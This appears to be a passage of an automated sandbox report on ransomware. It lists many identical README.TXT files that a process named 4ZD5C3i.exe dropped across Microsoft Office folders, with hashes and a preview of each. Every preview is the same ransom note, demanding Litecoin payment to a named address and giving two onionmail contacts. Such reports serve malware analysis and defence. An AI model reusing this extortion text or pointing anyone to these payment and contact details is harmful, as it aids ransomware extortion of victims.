                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\1033\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EURO\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\GRPHFLT\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\MSClientDataMgr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\Cultures\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModel\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\DataModelv16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
